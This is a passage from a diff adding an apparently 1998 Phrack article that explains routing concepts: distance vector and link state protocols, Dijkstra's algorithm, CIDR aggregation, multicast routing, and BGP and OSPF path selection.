+succession.  While convergence is an important goal of routing protocols, it
+is not a panacea to network woes.
+
+  
+----[  Distance Vector Routing
+
+Distance vector routing protocols distribute a list of <destination, cost>
+tuples to all of the router's neighbors.  These tuples assign a cost to reach
+every other node of the network.  It is important to note that this routing
+information is only distributed to routers which are assigned as neighbors to
+the originating router.  These neighbors are often physical, but can be
+logical in the case of eBGP multihop.  That cost is the sum of the link costs
+for the router to reach a destination.  Routers periodically send their
+neighbors distance vector updates; the neighbor then compares the received
+distance vector to its current distance vector.  If the received values are
+lower, the router sends output to the destination in the distance vector over
+the link that it received the vector over. 
+
+The count to infinity problem is a problem with many distance vector
+implementations.  We will assume that all links have a unit cost and that each
+hop corresponds to a unit.  For example, if router X is connected to router Y
+and router Y is connected to router Z, we can demonstrate this problem (see fig
+1).  Y knows a 1 hop path to Z and X knows a 2 hop path to Z.  Assume that
+link YZ goes down and the cost of that route is increased to infinity (fig 2).
+Now, Y knows an infinite cost route to Z because it knows the link is down so
+it propagates this distance vector to X.  Suppose X has sent an update to Y
+which advertises a 2 hop distance vector.  Now, Y will think that it can get
+to Z through X, so it sends X an update that says it can get to Z in three
+hops (fig 3).  Note that X has no idea that the distance vector being
+advertised to it was originated from X.  This is a serious flaw in distance
+vectors.  In their unmodified form, they do not contain the full path
+information that the route has traversed.  As illustrated above, the router
+alternates states of advertising a path to Z and advertising infinity to Z.
+They keep this exchange up forever or until they have reached some internally
+defined infinity count (say 15 as in the case of RIP).
+
+Count to Infinity problem:
+
+          X--------------------Y--------------------Z
+
+         Y:1                  X:1                  X:2
+         Z:2                  Z:1                  Y:1
+
+                            [ fig 1 ]
+    All links are up, below each node we note the destination and hopcount
+    from each respective node.
+
+
+          X--------------------Y--------* *---------Z
+
+         Y:1  <-------------  Z:infinity
+         Z:2  ------------->  X:1
+
+                            [ fig 2 ]
+    The link Y - Z breaks.  Node X advertises Z:2 to node Y.
+
+
+
+          X--------------------Y--------* *---------Z
+
+         Z:infinity(frm Y) -> X:1
+         Y:1  <-------------  Z:3
+
+                            [ fig 3 ]
+    Node Y sends its Z distance vector to X _before_ it recieves node X's
+    infinity.  Once node Y receives node X's infinity, it sets its distance to
+    infinity.
+
+A path vector is an easy way to defeat the count-to-infinity problem.
+Basically, each distance vector also includes the router path that it
+traversed (fig 4).  The router rejects an update from its neighbor if the path
+included in the update includes the router receiving the update (fig 5).  The
+Border Gateway Protocol (which is used to exchange routing information between
+Autonomous Systems on the Internet) incorporates the path vector to stop the
+count-to-infinity problem.  Obviously, you have to incorporate more
+information in the routing table if you want to include the AS path
+information that the route has traversed.  The designers of BGP decided that it
+was optimal to sacrifice storage space and processing power for the robustness
+that the path vector affords the routing protocol. 
+
+Path Vector Solution: 
+
+          X--------------------Y--------------------Z
+
+         Y:1 (Y)              X:1 (X)              X:2 (YX)
+         Z:2 (YZ)             Z:1 (Z)              Y:1 (Y)
+
+                            [ fig 4 ]
+    All links are up, below each node we note the destination, hopcount and
+    path vector from each respective node.
+
+
+          X--------------------Y--------* *---------Z
+
+         Y:1 (Y)              X:1 (X)
+         Z:2 (Y Z)            Z:infinity
+
+                            [ fig 5 ]
+    The link Y - Z breaks.  Node Y knows to ignore Xs advertisement of Z 
+    because Y is the path vector.  The avoids the count-to-infinity problem.
+ 
+
+Another way to counter this problem is the split horizon.  Basically, this
+means that a router shouldn't advertise a path to a neighbor if that neighbor
+is the next hop to the destination.  This solves the problem presented in the
+example above because the path to Z from X through Y would not have been
+advertised to Y because Y is the neighbor _and_ the next hop to the
+destination (Z).  A variation called split horizon with poisonous reverse has
+router X advertise an infinite cost to get to destination Z.  Under a split
+horizon, router X would not advertise that it could get to router Z.
+
+
+----[  Link State Routing
+
+A router using a link state routing protocol distributes the distance to its
+neighbors to every other router on the network.  This allows each router on
+the network to make a routing table without knowing the full cost to the
+destination from any one source.  The problems of loops are avoided because
+each router contains the full topology of the network.  Basically, the router
+makes a 3 tuple containing the source router (itself) the neighbor and the
+cost to its neighbor.  Therefore, if router A is connected to Router B over a
+link of cost 3 and router A is connected to router C over link cost 5, then
+router A would advertise the Link State Packets (LSPs) <A,B,3> and <A,C,5> to
+all routers on this network.  Each router on the network would evaluate all of
+the LSPs that it receives and calculate a shortest path to every destination
+on the network. 
+
+Obviously, the LSP is an integral part of the convergence process.  If someone
+could inject false LSPs into the network, it could result in misrouted
+information (a packet taking a longer path than it should) or even in the
+blackholing of a router on the network.  This is not necessary a malicious
+attack of a network, however.  Router C could advertise a link to its neighbor
+D with the 3 tuple <C,D,6> and then withdraw the announcement when the link
+goes down.  Unfortunately, if the LSP advertising the link having an infinite
+cost arrives before the LSP advertising the cost of that link being 6, the
+routing table will not reflect the topology of the network and will be in that
+state until another LSP comes to correct the problem. 
+
+To combat this, a sequence number is introduced into the LSP.  Therefore, all
+of the routers on the network would initialize their sequence number to some
+starting value and then start advertising their LSPs.  This solves the above
+problem in that the LSP advertising the link of infinite cost would have a
+higher sequence number than the LSP advertising the link as having cost 6.
+
+Some problems encountered when using sequences numbers are finite sequence
+space, sequence initialization, and aging.  It is in the best interest of a
+robust link state protocol needs to protect its LSPs as well as choose a
+sequence space which is sufficiently large to accommodate updates.  The
+sequence space that the LSPs can use is set to some finite value.  Therefore,
+when the sequence numbers reach the top of the space, they must wrap around
+towards the smallest sequence number.  This presents a problem because when a
+router compares link state updates, the greater sequence number takes
+preference.  To combat this problem, you can define a maximum age of the LSP.
+Therefore, if you have not received an update in X ticks, you discard the
+current LSP information and wait for a further update.  It must be noted that
+this invalidates the path information to a destination.  For example, if
+router Y advertises a cost to its neighbor router Z where router Y is
+connected by one link to a meshed network, when the link between the mesh and
+router Y breaks, the other routers in the mesh have preserved link state
+information that will allow them to find a path towards Z.  If they receive no
+updates in MAX_AGE, then they will assume that the link to Y is unreachable.
+This will allow each router to converge its table and allow it to advertise an
+infinite LSP for Y and Z. 
+
+Sequence initialization is also an important facet of this problem.  Say
+router Y crashed and is rebooting while the network is recalculating paths to
+it.  When it starts its link state protocol back up, it must somehow indicate
+that it needs to reinitialize its sequence number to the last number it gave
+all of the other routers to allow for coherence.  Therefore, it can announce
+paths with a sequence number in a special "initialization set".  This
+initialization set will tell the other routers that this router needs the
+sequence where it left off.  This is the "lollipop sequence" idiom.  The
+sequence space really resembles a lollipop in that the normal sequence number
+keep churning around the finite sequence space while reinitialization takes
+place in a short linear sequence space (comparable to the stick :).
+
+Great pains are taken to ensure the integrity of LSPs.  In fact, this entire
+routing algorithm depends on the LSP being digested in a coherent method to
+guarantee that each router has the correct view of the network topology.  The
+question still remains how the root node router computes the distance to each
+destination. 
+
+Because of the general nature of a link state protocol, you have various nodes
+of the network advertising the distance to get to their neighbors to every
+other node on the network.  Thus each node has a collection of neighbor
+distances from various routers on the network.  The routing table is basically
+'grown' outward from the root node to all of the network extremities.  This
+will be explained in a slightly rigorous fashion in the next section.
+
+
+----[  Dijkstra's Algorithm
+
+This algorithm is a simple and elegant way to determine network topology.
+Basically, there are two distinct sets of destinations on the network.
+Destinations in set K are known routes for which a shortest path has been
+computed.  Destinations in set U are routers for which the best path to that
+router is not currently known.  In this set, paths are being considered as
+candidates to be the best path to that destination. 
+
+To start off, add the current node p into the set K.  Then add all of its
+neighbors into the set U with path/cost associations.  If there is another path
+to one of the neighbors in the U set, then choose the path which costs the
+least.  When the neighbors N* are added to U make sure that they indicate the
+cost through p as well as p's ID . 
+
+Once this has been done for the set U, then pick the neighbor n to p which has
+the smallest cost to reach p.  This is assuming that the neighbor has not
+already been installed in K.  This algorithm stops when set U is equivalent to
+the empty set.  When set U is null, it is implied that all destinations are in
+set K and have the shortest cost from the root node P on which this algorithm
+is running.  Note, that each step evaluates adds ONE neighbor into K. That
+neighbor is the router with the smallest cost to reach p. 
+
+
+----[  Distance Vector vs. Link State
+
+We are left with these protocols like BGP which uses path vector and OSPF
+which uses link state.  Why do they occupy such orthogonal space?  When a link
+state protocol is working correctly, it guarantees that there will be no
+routing loops in the network. The link state protocol also guarantees fast
+convergence when there is a change in the topology of the network because the
+link state is distributed on a flat routing space.  Since link state protocols
+contain these inherent advantages, why do protocols like BGP chose to employ
+the path vector approach? 
+
+Taking a cross-section of routing protocols that are employed on the internet,
+one finds that the majority of large providers use OSPF to resolve routing
+information on their internal network and BGP to talk to other distinct
+networks (or autonomous systems) at their borders of administration.  What
+suits BGP as an external protocol and OSPF for an internal routing protocol? 
+
+One issue, which will be discussed in the next section, is hierarchy.  BGP
+provides a mechanism for a routing hierarchy which enables it to greatly
+reduce the space of its table.  OSPF, which is a link state protocol,
+provides a flat routing table whereby any internal router knows the full
+hop by hop path to any destination within the autonomous system.  Furthermore,
+distance vector protocols understand that different areas can have different
+views of the network where link state protocols require that each node
+independently compute a consistent view of the network.  This saves the DV
+protocol the overhead of maintaining a correct LSP database.  BGP also has
+another 'advantage' in that it is layered on top of the Transmission Control
+Protocol (TCP).  Therefore, in the 'best-effort' service of IP networks, BGP
+has assurance (to the level that TCP can guarantee) that routing information
+will be propagated.  Whereas, you can (or should) be able to govern the status
+of your internal network, the nebulous exterior past your border routers
+confers no delivery guarantee on your routing information.  
+
+Each type of routing algorithm is suited for its function.  Link State
+protocols provide the quick convergence that is essential to an internal
+network while distance vector protocols provide external reachability.
+Hierarchy is not something that is inherent in distance vector protocols,
+but the implementation of a hierarchy has made BGP a widely used exterior
+gateway protocol.
+  
+
+----[  Routing Hierarchy
+
+Routing hierarchy is an oft fought debate that borders on religion.  There
+are constantly questions about how hierarchy should be implemented (if at
+all) in the free form state of the current global network.  Hierarchy imposes
+a tree of authority with the overall authority at the top of the tree and
+branching down to regional authorities, local authorities ad infinitum.
+Hierarchy simplifies routing because if a destination is not locally routable
+(or under your section of the tree).  You can iterate up towards the top tree
+to try and deliver that information.  As you move towards the top, the routing
+information contained in the routers becomes less and less specific until you
+reach the root node which is the least specific.  It does, however, know how
+to route information to every possible destination on the network.  It may help
+you to envision the hierarchy of the telephone network (built under one
+collective).  If a call cannot be placed within a central office, it is handed
+to either another central office in the area code or a wide area link.  The
+wide area link understands how to route to each area code in a full national 
+mesh whilst the local 5ess switch only knows routing information for more
+specific prefixes.  As the phone number becomes less specific (from right
+to left), the routing decision moves further up the strict hierarchy.
+
+This similar to how the domain name system (DNS) works on the internet (fig 6).
+You provide local records for domains that you host.  When your nameserver
+receives a query for a record, it either returns the fact that it has
+authority for that record or points toward the root nameserver.  The root
+nameserver knows the delegations of .com, .net, .org et al. and then points
+towards the site responsible for that top level domain.  That site then points
+towards the site that has authority for the specific second level domain.
+Domain names take the form of most specific -> least specific; i.e.
+microsoft.com is more specific than just .com.  Likewise
+gates.house.microsoft.com is more specific than microsoft.com.
+
+DNS Hierarchy: 
+                            ___ . ___
+                           /    |    \
+                      .com.   .org.   .edu. 
+                         /      |      \
+           microsoft.com.    eff.org.   isi.edu. 
+                       /        |        \
+   billy.microsoft.com.    x0r.eff.org.   rs.isi.edu. 
+
+                            [ fig 6 ]
+    Each level in the hierarchy is responsible for levels of greater
+    specificity.
+  
+Root authority is controlled by the Internet Assigned Numbers Authority
+(IANA).  It provides the top of the hierarchy in a "centrally" managed
+database (in fact, there are multiple root servers distributed across the
+county which maintain a consistent database).  This is the closest example of
+strict hierarchy that can be found on the internet. 
+
+With IP addresses, specificity increases in the opposite direction.  IP
+addresses (version 4) are 32-bits.  The rightmost bit signifies the greatest
+amount of specificity and the leftmost, the least.  IP routing authority
+information is not maintained in a centralized database.  Routing information
+is exchanged between autonomous systems via the BGP protocol.  Routes take
+preference in order of most specific -> least specific.  In this way, there is
+some type of hierarchy in the system (even though it is more loose than the
+DNS example).  Generally, larger providers control larger parts of the total
+IPv4 space ((2^32) - 3 addresses).  The converse is also true. 
+
+Classless Inter-Domain Routing (CIDR) also helped to decrease the size of
+routing tables and increase the appearance of hierarchy.  Now, instead of
+Sprint announcing routes to 130.4.0.0 through 130.20.0.0 (on the classical B
+space boundary) it could announce 130.4.0.0/12 which encompasses that entire
+16 class B range.  The classful ranges, subnetworking and the like are
+discussed in my "introduction to IP" page and are therefore not included in
+this document. 
+
+
+----[  Routing Hierarchy and Aggregation
+
+BBN divides their 8/8 network into two subnetworks and advertises reachability
+to the aggregate to save table space.  Once inside an AS, routing obeys a fairly
+strict hierarchy.  Router A is responsible for the entire 131.103/16.  It
+divides it into two /17. Likewise, Router D in AS1 is responsible for 8/8 and
+chooses to divide it into 8.0/9 and 8.128/9 and divides responsibility for
+these networks to Routers E and F respectively (fig 7).  Routers B, C, E, and F
+can further choose to subdivide their networks in a hierarchical fashion.
+Because of the binary nature of subnetting, networks can only be divided in
+half.
+
+Routing Hierarchy and Aggregation:
+
+                                       BGP
+
+                131.169.0.0/16  <-------------------->  8.0.0.0/8
+                      A (AS1239)                        D (AS1) 
+                    /   \                             /   \
+                 B /     \ C                       E /     \ F
+                  /       \                         /       \
+     131.169.0.0/17       131.169.128.0/17      8.0/9       8.128/9
+
+                            [ fig 7 ]
+    In the internet, there is no strict routing hierarchy.  There are simply
+    large networks which peer via BGP to distribute aggregated routing
+    information.
+
+
+The national backbone is populated by few nodes (when compared to the end
+nodes).  Most national providers are one or two router hops away from every
+large network.  Through aggregation in networks below, national providers
+provide fully (or at least we hope) aggregated routing information.  In a
+strict hierarchy, only one router on any given hierarchy level can advertise
+reachability to a specific portion of the network.  In the current state of
+the Internet, multiple routers can advertise reachability information.  For
+example, Sprint announces 131.169.0.0/16 out to Digex, MCI, and BBN.  Though
+this breaks some of the benefits of a strict hierarchy, it confers other
+benefits.  This scheme allows for distributed control of routing information
+instead of depending on the node above.  Also, nodes on the same level are
+often interconnected to aid in the dissemination of routing information.
+  
+
+----[  Aggregation
+
+As discussed slightly before, aggregation allowed the internet to reduce the
+size of its external reachability tables.  Before, the granularity of route
+announcements allowed for only /8, /16, and /24 (octet boundaries).  Now, with
+CIDR you could use variable length subnet masks.  The only requirement was
+that they fall on one of the 32-bit boundaries of the IP address.
+
+Classless routing not only allows us to minimize routing table space, it also
+allows us to divide up large chunks of unused space into manageable pieces.
+Much of the Class A space is terribly under-utilized.  With this scheme one
+can more efficiently allocate IP addresses to providers/netizens. The American
+Registry of Internet Numbers (ARIN) controls the allocation of IP addresses
+within the United States.
+
+Aggregation helps alleviate the problems of not being in a strict hierarchical
+structure.  It allows the least amount of route table specificity at each
+level (assuming the routers on that level choose to fully aggregate their
+announcements.)  The less specific aggregates do not necessarily indicate the
+position of a router in the hierarchy.  For example, a university may announce
+a /8 and be 3 hops away from the national backbone. 
+
+A problem with aggregates can be found when we examine candidate route
+specificity.  If ISP A only has address space from within the allocated block
+to their parent P, then aggregation could cause problems if ISP A wanted to
+multihome to parent Q.  The problem comes in that ISP A is obligated to
+advertise reachability only to their space.  This would constitute them
+announcing their address space to Parent Q.  Assume that parent P aggregates
+ISP A's space into a /16 for the sake of saving route announcements.  Now, ISP
+A would seem to have better reachability only through parent Q because of the
+specificity of the route announcement (remember that more specific routes take
+precedence over less specific routes).  This would nullify the benefits of
+multihoming in an attempt to distribute load over the two lines.  In this case,
+ISP A would ask parent P to announce a more specific destination which has a
+length matching the length of the aggregate assigned to ISP A.  Therefore, to
+the world above parent P and parent Q, the path to ISP A looks equally
+appealing. 
+
+
+----[  Exterior/Interior
+
+It is important to look at how routing information is disseminated throughout
+the network.  It has already been discussed that we use separate routing
+protocols (with their respective benefits/costs) to talk to the internal and
+external world.  However, these protocols cannot take orthogonal views on
+routing information.  In fact, the interplay between interior and exterior
+routing protocols is what allows data to be effectively relayed to a
+destination external to the network as well as to distribute external routing
+information to all nodes on the internal  network. 
+  
+There are a few ways to ensure that each router has a consistent view of the
+network.  One is to distribute the external protocol into the internal
+protocol.  Thereby, the internal protocol instantly has routing information
+injected in it for the best path to every external destination.  Note that the
+router which talks eBGP (or comparable protocol) only redistributes the route
+that it installs in its routing table and not the other candidate routes which
+may have been advertised to it. 
+  
+Another approach is to inject the interior protocol into the exterior protocol.
+Of course, this necessitates filtering at the entrance point to the exterior
+protocol to prevent the announcement of all internal specifics.  You can
+accomplish internal routing dissemination inside an Interior Gateway Protocol
+mesh.  Because of the specifics of protocols like BGP, externally learned
+routing information will only be propagated one logical hop within the network.
+Therefore, every router that must know this external reachability information,
+must be fully meshed with the eBGP speaking routers.  Also, if other routers
+are injecting information into the Exterior Gateway Protocol, the router
+should be logically fully meshed with them. 
+  
+
+----[  Multicast Routing Overview
+
+What we have been talking about above is unicast routing.  In unicast routing,
+you assume that each packet has a single destination address.  Assuming
+infinite resources being available, unicast is a feasible solution for every
+situation.  However, there are situations when it would be advantageous to send
+a packet to multiple destinations from a single source (point to multipoint) or
+from multiple sources to multiple recipients (multipoint to multipoint).
+
+The point of multicast is to provide a multicast group to which hosts can
+subscribe and get the specific multicast feed.  The multicast group is a single
+IP address in class D space.  Therefore, the senders and receivers are only
+associated by a given multicast group address.  Thus, the senders move their
+data towards the multicast group address and the receivers specify that they
+want to receive information from a given group address.  In fact, the sender
+is not required to know any information about the hosts that are receiving the
+feed. 
+
+
+----[  Multicast vs. Unicast
+
+If one was sending packets from a single source to a set of destinations, it
+is important to investigate how multicast and unicast handle the distribution. 
+
+Assume that router A is sending data to routers B, D and E.  A is at the top of
+the hierarchy, B and C are at the second level of the hierarchy, and D and E
+are below router B.  With multiple unicast (fig 8), router A makes 3 copies of
+the packet and sends them down link AB.  Router B then sends one packet to a
+host off of its ethernet and forwards the last two packets to routers D and E
+whereupon those routers send the packets to the their respective hosts in the
+multicast group. 
+
+Therefore, this transmission takes up 3 packets per second on link AB and 1
+pps on links B->Host(b), router D and router E.  In a multicast routing
+implementation, assuming the same topology, we will have less packets.  The
+difference is that router A sends _one_ packet over link AB.  Router B then
+triplicates the packet and sends it to Host(b), router D and router E (fig 9).
+One way for triplicating the packet is to simultaneously close crossbars on a
+fully crossed switch fabric, thus sending data from one input to three outputs
+simultaneously.  As long as there is route redundancy, multicast is very
+efficient because it minimizes redundant packets traveling to the same
+next-hop.  Simply, as long as there is route redundancy for the distributed
+session (for example, an audio feed) you will see an advantage with multicast
+over unicast. 
+
+Multicast Overview Example:
+
+        Multiple Unicast:
+                        A           A sends 3 packets to B.
+                       / \
+                      /   \ 3
+                     /     \
+                    C       B       B sends 1 packet to each to D and E.
+                           / \
+                        1 /   \ 1
+                         /     \
+                        D       E   D and E send 1 packet to their respective
+                                    hosts. 
+
+                            [ fig 8 ]
+
+        Multicast:
+                          
+                        A           A sends 1 packet to B
+                       / \
+                      /   \ 1
+                     /     \
+                    C       B       B duplicates the packet for its host; 
+                           / \      therefore, there is 1 packet (at most) on 
+                        1 /   \ 1   each link.
+                         /     \
+                        D       E
+
+                            [ fig 9 ]
+
+
+This is a multicast topology rooted at node A.  There is also a shortest path
+from A to every destination in the multicast group.  This is called the
+shortest path multicast tree rooted in A.  Data would like to shortest path on
+the network layer.  One problem with multicast sessions is that recipients
+join and leave during a multicast session.  This requires pruning of the
+multicast "tree" so that packets do not clutter a link on which there is no
+one requesting data from a given multicast group.
+
+To detect if there are hosts on a particular broadcast LAN that are interested
+in a multicast group, the router sends out Internet Group Management Protocol
+(IGMP) messages.  Each packet has a random reply time from which the host will
+express interest.  This is to prevent all hosts on a broadcast LAN from
+responding at the same time to an IGMP query.  Once one host desires to
+receive data destined for a particular multicast groups, all other hosts which
+desire to be in the multicast group can discard their replies because the
+router knows to multicast all incoming packets destined for that group.  The
+host then configures its adapter to answer for the MAC address corresponding
+to that group. 
+
+Multicast must also be functional outside of the broadcast LAN.  A simple
+solution to the problem is to give each router for which multicast is enabled
+the multicast packet.  This is called flooding.  Basically, it functions by
+forwarding the packet to every interface other than the one that the packet
+arrived on.  The inherent flaws in this approach is that there is packet
+duplication as well as packets being sent to routers which have no hosts
+subscribed to the multicast group.  To clarify the duplication statement, if
+Router A is physically meshed with routers B, C, and D and linked to its
+upstream via serial, when router A receives the multicast packet, it floods it
+out the interfaces to routers B, C, and D.  These routers then flood the packet
+out the interface other than the one they received the packet on (namely the
+interface that connects them to A).  This results in each of these routers
+receiving two copies of the packet (other than the one they received from A)
+in this exchange.
+
+A solution to this problem can be found in a technique called Reverse Path
+Forwarding (RPF).  RPF specifies that the router forwards a packet with a
+source address of X only if the interface which the router receives the
+packet on corresponds to the shortest path that router has to source
+X (fig 10).  Therefore, in the above example, each of the meshed routers
+_still_ receives 2 duplicate packets in the second step, but they refuse to
+forward them because only the packet received from the interface directly
+connected to A will be forwarded.  As noted, RPF does not completely solve
+the problem of packet duplication.  To solve this, we must introduce
+pruning.  The idea is simplistic: inform neighbors that you do not wish to
+receive multicast packets from source X to multicast group Y.  You can also
+specify prunes to a particular group.  If a router tells its neighbors that it
+did not desire to receive packets for group Y and then has a host which
+desires to receive group Y, it sends a graft message to its neighbors
+specifying that it be added into the multicast tree.
+
+As a unicast aside, RPF can also be used to eliminate source address spoofing
+in that the router will only forward packets from source Y if it is receiving
+it on the interface which is the shortest path to source Y.  Thus, if the
+router receives packets from an external link which say their saddr ==
+saddr(y), the router will not forward them because its shortest path to Y is
+not from the external link. 
+
+RPF Example:
+
+                    | <-- Point of ingress.
+                    |
+                    A-----------C
+                    |\         /|
+                    | \_______/ |
+                    | /       \ |
+                    |/         \|
+                    B-----------D
+
+                            [ fig 10 ]                  
+    ABCD are physically meshed.  When A distributes a packet to BCD, there is
+    no problem.  Now, in the next step, B, C,and D forward the packet to each
+    of their respective neighbors (for B it would be C and D and ! A because
+    it received the packet from A).  This results in C and D receiving 2
+    packets in this entire exchange.  Note that C and D now do _not_ forward
+    the packet they have received from A through B because that is not their
+    shortest path to A. Their shortest path is their direct link. 
+
+
+----[  The Multicast Backbone (MBONE) 
+
+It would be myopic to assume that every router on the internet supports
+multicast.  Thus, when a router needed to find the shortest path to a
+destination (for forwarding of a multicast packet) it could look in the
+unicast routing table.  Unfortunately (or fortunately depending on your
+perspective)  most routers on the Internet do not support multicast or do
+not have it enabled by default.  Therefore, until most routers support
+multicast, it has been "layered" over IP and tunneled from multicast router to
+multicast router (more specifically, the multicast header and data is
+encapsulated in a unicast IP header).  The tunnel (which bridges the gap of
+unicast only routers between multicast routers) informs each end that some
+packets will contain a multicast group in their payload.  This allows data to
+be routed by using unicast forwarding tables while at the same time preserving
+the integrity of the multicast group id. 
+
+Because these multicast routers are not necessarily connected physically
+(though they are tunneled logically), they must be connected by a multicast
+routing protocol.  This is necessary because the closest path via multicast
+may not correspond to the shortest path over unicast only routers.  Distance
+Vector Multicast Routing Protocol (DVMRP) is an initial foray into this realm.
+DVMRP distributes "unicast" routes to facilitate the construction of shortest
+path trees.  DVMRP uses the flood and prune method discussed above to discover
+/maintain multicast trees.  There is also a link state foray into this arena.
+Multicast Open Shortest Path First (MOSPF) takes the LSP approach and
+calculates shortest absolute path.  One host off of a multicast router can
+request to be in a multicast group.  That router then distributes an LSP over
+the network.  Of course, MOSPF (being a link state protocol) runs into
+salability problems.  It is computationally expensive for a router to compute
+reachability information for each end node router.
+
+Core based trees (CBT) are an attempt to alleviate the problems that DVMRP and
+MOSPF experience.  The concept is that multicast routers send join requests to
+core routers of arbitrary designation.  When a router learns of a host which
+wishes to join a specific multicast group, it forwards a packet to the core
+multicast router.  Every router along the way forwards the packet towards the
+core router and marks the interface on which the packet arrives so that it
+knows where to forward the multicast packets from the core.  This solves the
+problem of having to communicate topology among all of the endpoints.  The
+choice of a core multicast router is a non-trivial because all multicast
+traffic for multicast routers branching off of it _must_ pass through the core
+router.
+
+  
+----[  Protocol Independent Multicast
+
+Protocol independent multicast (PIM).  Pim is a balance between flood and
+prune and CBT.  When there are many multicast routers on a given network, it
+is more efficient to use the flood-and-prune method.  This network environment
+is called "dense".  On the contrary, sparse mode defines networks where there
+are few multicast routers.  In sparse mode, it is more efficient to use CBT
+because the core router is not weighted in an environment when it 'polices'
+few multicast routers.  When most of network is comprised of multicast routers,
+it is not prudent to require all sessions to be coordinated (and routed
+through) a core.  Sparse mode PIM has been adapted from CBT to allow data to
+reach its destination via the core or through the shortest path tree.
+Currently, the operator must define whether groups are sparse or dense instead
+of leaving it up to the protocol.  cisco systems' implementation of pim also
+supports a middle ground called 'sparse-dense' mode.
+
+
+----[  Border Gateway Protocol
+
+There has been some mention of the Border Gateway Protocol (BGP) in this
+document.  BGP was groomed as the successor to the Exterior Gateway Protocol
+(EGP).  BGP is mainly an exterior routing protocol.  It is used to communicate
+with systems outside of the operator's control and both distribute and receive
+network layer reachability information (NRLI) from the neighboring routers.
+BGP must be a robust protocol which has the capability of quick convergence
+while at the same time, not being influenced by frequent shifts in topology.
+When you use BGP to receive routing information, you are depending on the
+other networks to distribute correct information to your network. 
+
+A BGP speaking router communicates with its peers via TCP.  TCP over IP is a
+mechanism for guaranteeing the transmission of data over a best effort service
+at the IP layer.  The choice of TCP as the distribution mechanism for BGP
+information is a point of contention.  While TCP provides inherent checksums,
+acknowledgments, retransmissions and duplicate suppression mechanisms for
+received packets, it does not guarantee packet order or packet path.  This can
+lead to headaches for the router receiving this information.
+
+BGP peers communicate with a variety of message formats.  BGP speakers use the
+OPEN message to establish a peering relationship with other speakers.  BGP
+speakers use the UPDATE message to transfer routing information between peers.
+Update information includes all routes and their associated attributes.
+KEEPALIVE messages assure that BGP peers are active.  NOTIFICATION messages
+inform peers of error conditions.
+
+
+----[  BGP path selection
+
+It is important that we understand the messages that constitute the Border
+Gateway Protocol, but we are still left with the question of how BGP works on
+the internet.  One important area of clarification is in the BGP path selection
+algorithm.  This algorithm is how BGP decides which route to prefer and
+attempt to install in the routing table.
+
+This algorithm is employed when there are multiple paths to a destination.  As
+a failsafe, the first selection looks at the next hop and determines if it is
+accessible.  If the next hop is not accessible, it is important not to
+consider that route as a candidate path to a destination because all data sent
+to its next_hop will be blackholed.  The second selection mechanism is the
+weight of the route.  Weight is a proprietary implementation to cisco Systems
+routers and is analogous to local preference.  If two routes have different
+weights, the route with the largest weight is selected.  Notice that the
+selection mechanism is basically a logical if->then chain.  If candidate paths
+differ at a level of the selection algorithm, then the favorable path is
+selected and the algorithm ceases trying to decide which path to prefer.  The
+next level is the local_pref attribute.  This is a well known mandatory BGP
+attribute.  Much like weight, the path with the highest local_pref is
+preferred.  After local preference, the router selects the path that it
+originated.  If the router didn't originate the paths, then the path with the
+shortest AS_PATH length should be selected.  AS path length gauges the number
+of autonomous systems that this routing information has traveled through.
+The purpose of this selection relies in the assumption that the less ASNs the
+route has passed through, the closer the destination.  If all of the above
+attributes are identical, then prefer path origin in this fashion IGP > EGP >
+Incomplete.  If the path origins are the same, prefer the path with the lowest
+value MULTI_EXIT_DESCRIMINATOR (MED).  MEDs are commonly used to distinguish
+between multiple exit points to the same peer AS.  If none of these attributes
+are dissimilar, then prefer the path through the closest IGP neighbor.  If
+that fails, the tiebreaker is preferring the path with the lowest IP address
+specified in the BGP router-id section discussed above. 
+
+This selection algorithm allows effective establishment of routing policy.  If
+I wanted to prefer routes from a certain AS over routes to another AS, I could
+establish a route-map at both entry points of external routing information and
+assign a higher LOCAL_PREF to the routes from the AS I want to favor.
+Unfortunately, this does not provide much granularity.  This means that all
+traffic will be routed to the favorable AS and does not allow us to balance
+the load over our multiple connections.  If you allow path selection to
+progress to the AS path length decision level, then you will get decent
+(though not 50-50) load balancing to destinations.  This of course is assuming
+that you have providers with comparable customer routes and connectivity.  If
+you have a DS3 to MCI and a DS3 to the local BFE provider, nearly all traffic
+will move out the MCI pipe if the BGP decision is allowed to progress down to
+the AS path length category.  At earlier selections, you can change the
+preference of routes by using AS path access lists to select routes based on
+as path regular expressions.  For example, if you wanted to select all routes
+that traversed UUnet and send them out your BFE provider, you could use a route
+map to match an AS path access list which contained _701_ and set the
+local_pref to 100 (or some value higher than the UUwho traversed paths from
+MCI).  This will force all traffic destined for UUwho to exit your AS over
+your BFE DS3.  While this affords you some granularity in load balancing, it
+is often not optimal.  Basically, you are forcing traffic out a path that it
+would not normally select.  If that BFE provider has many hops before it can
+reach UUnet, you are forcing the traffic you send out that link to traverse
+all of those hops and be subject to (possibly) more link congestion, latency,
+etc.
+
+Routing policy is something that requires the tweaking of many knobs.  Much of
+the tweaking I have described above pertains to cisco Systems routers.  It is
+important to understand that you must think through routing policy before you
+implement it.  You must evaluate what load balancing you want, what traffic
+symmetry you want, and what general quality of service your traffic will
+receive because of your decisions.
+  
+For information more specific than this, read the BGP RFC or current BGPv4
+internet draft [1].
+  
+
+----[  Open Shortest Path First v2 (OSPFv2)
+
+We are not going into great detail about OSPF.  It is a link state routing
+algorithm.  As noted above, link state algorithms route on flat space (no
+hierarchy).  OSPF is an improvement over the vanilla LS protocol because it
+provides areas of maintenance for hierarchy purposes.  Areas distribute full
+information internally by running a separate OSPF process with its area ID.
+Each router has an identical link state database with other routers within its
+area, but not with external routers.  Each area operates in an autonomous
+state and transfers inter-area information at junction routers called area
+border routers.  These routers are in two or more areas and help distribute
+information between these areas.  The router has separate link state databases
+for each area to which it is connected. 
+
+OSPFv2's main advantage is that it supports Variable Length Subnet Masks
+(VLSM).  This means that a router can advertise reachability with more
+granularity than a scheme which advertised host reachability. Therefore, if
+the router can distribute packets to all hosts from 206.4.4.1 -> 206.4.5.254
+it advertises reachability to 206.4.4.0/23 instead of each classful network
+separately or each host separately.  This obviously saves immensely on link
+state database size and processing power required.
+
+For information more specific than this, read the current OSPFv2 RFC or
+internet draft [2].
+  
+
+----[  References
+
+[1] Rehkter, Y., Li, T., " A Border Gateway Protocol 4 (BGP-4)",
+            draft-ietf-idr-bgp4-07.txt, February 1998. 
+
+[2] Moy, J., "OSPF Version 2", draft-ietf-ospf-vers2-02.txt,
+            January 1998. 
+
+----[  EOF
+
diff --git a/phrack53/6.txt b/phrack53/6.txt
new file mode 100644
index 0000000..d13237f
--- /dev/null
